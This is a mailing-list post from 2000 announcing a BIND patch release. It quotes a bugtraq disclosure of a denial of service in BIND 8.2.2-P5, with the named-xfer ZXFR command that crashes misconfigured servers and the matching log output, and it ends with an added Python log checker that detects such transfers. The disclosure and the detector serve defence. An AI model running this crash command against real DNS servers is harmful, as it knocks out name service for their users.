BIND-8.2.2-P7: RE: BIND 8.2.2-P5 Possible DOS

Mathias Körber mathias at koerber.org
Fri Nov 10 16:08:58 UTC 2000


A new bug-fix version (8.2.2-P7) has been available on www/ftp.isc.org
since earlier Thursday (PST).

> For those who don't want to read bugtraq or don't have time, here's the mail
> about the new DOS.
>
> I've tried it on OpenBSD 2.7 with bind 8.2.2p6 and it works pretty well...
>
> >
> >Hi,
> >playing with bind and ZXFR feature ( zone transfer compressed with a possible insecure
> >execlp("gzip", "gzip", NULL); ), I discovered a Denial Of Service against Bind 8.2.2-P5 .
> >
> >By default Bind 8.2.2-P5 is not compiled with ZXFR support unless you define it with #define BIND_ZXFR
> >so it will refuse any ZXFR transfer, because it doesn't support it.
> >But now what happens? Look here...
> >
> >################################
> >zone to transfer: zone.pippo.com
> >dns server:       dns.pippo.com 192.168.1.1
> >me:               naif.gatesux.com 10.10.10.10
> >I send a Zone Transfer request using "-Z" switch which means that I wish to use ZXFR.
> >dns.pippo.com doesn't support ZXFR and has "allow-transfer{}" not configured, so everyone
> >could ask him for *.zone.pippo.com ...
> >
> ><naif at naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer  -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com
> >named-xfer[29297]: send AXFR query 0 to 192.168.1.1
> >named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
> >
> >On the server's log:
> >Nov  7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
> >Nov  7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284
> >
> >Then the server "*** CRASHED ***" .
> >
> >I should assume that bind 8.2.2-P5 is vulnerable ( Please someone test and confirm this kind of dos)
> >and bind-9.0.0 has no support for ZXFR .
> >
> ><naif at naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
> >    234
> ><naif at naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
> >      0
> >
> >A lot of DNS Servers are misconfigured, and allow zone-transfer to any, so they are dossable...
> >
> >
> >naif
> >naif at itapac.net
>
>
> -----------------------------------------------------------------------------------------
>
>       Alec Barea
>       UNIX System Administrator / DNS specialist
>       SITA / EQUANT
>       alec.barea at sita.int
>       Tel:  +1 514 847-3436
>       Fax: +1 514 847-3400
>
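
Added example, not part of the original message or of BIND: a log check for the pattern quoted above, flagging zone transfers approved for hosts outside an expected set of secondaries and any "unsupported XFR" line. The regexes are modelled on the two named log lines in the quoted report; `allowed_secondaries`, the sample addresses and `SAMPLE_LOG` are constructed assumptions.

```python
import re

# Patterns modelled on the two named log lines quoted in the report above.
APPROVED = re.compile(
    r'named\[\d+\]: approved (?P<type>\w+) from '
    r'\[(?P<ip>[\d.]+)\]\.(?P<port>\d+) for "(?P<zone>[^"]+)"')
UNSUPPORTED = re.compile(
    r'named\[\d+\]: unsupported XFR \(type (?P<type>\w+)\) of '
    r'"(?P<zone>[^"]+)" \(\w+\) to \[(?P<ip>[\d.]+)\]\.(?P<port>\d+)')

# Constructed sample input (documentation address ranges, hypothetical host ns1).
SAMPLE_LOG = [
    'Nov  7 11:19:09 ns1 named[4242]: approved AXFR from [192.0.2.53].1045 for "example.com"',
    'Nov  7 11:20:01 ns1 named[4242]: approved ZXFR from [198.51.100.7].2284 for "example.com"',
    'Nov  7 11:20:01 ns1 named[4242]: unsupported XFR (type ZXFR) of "example.com" (IN) to [198.51.100.7].2284',
]


def review_transfers(lines, allowed_secondaries):
    """Return (finding, xfr_type, client_ip, zone) tuples.

    unexpected-transfer-client: a transfer was approved for a host that is
        not a known secondary, i.e. allow-transfer is effectively open.
    unsupported-xfr: a transfer type the server was not built to serve
        (the ZXFR case described in the report) was requested.
    """
    findings = []
    for line in lines:
        m = APPROVED.search(line)
        if m:
            if m["ip"] not in allowed_secondaries:
                findings.append(
                    ("unexpected-transfer-client", m["type"], m["ip"], m["zone"]))
            continue
        m = UNSUPPORTED.search(line)
        if m:
            findings.append(("unsupported-xfr", m["type"], m["ip"], m["zone"]))
    return findings


if __name__ == "__main__":
    # 192.0.2.53 is the only expected secondary in this constructed setup.
    for finding in review_transfers(SAMPLE_LOG, {"192.0.2.53"}):
        print(finding)
```

A finding of the first kind means the server approved a transfer for a client that an `allow-transfer` restriction would have refused.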



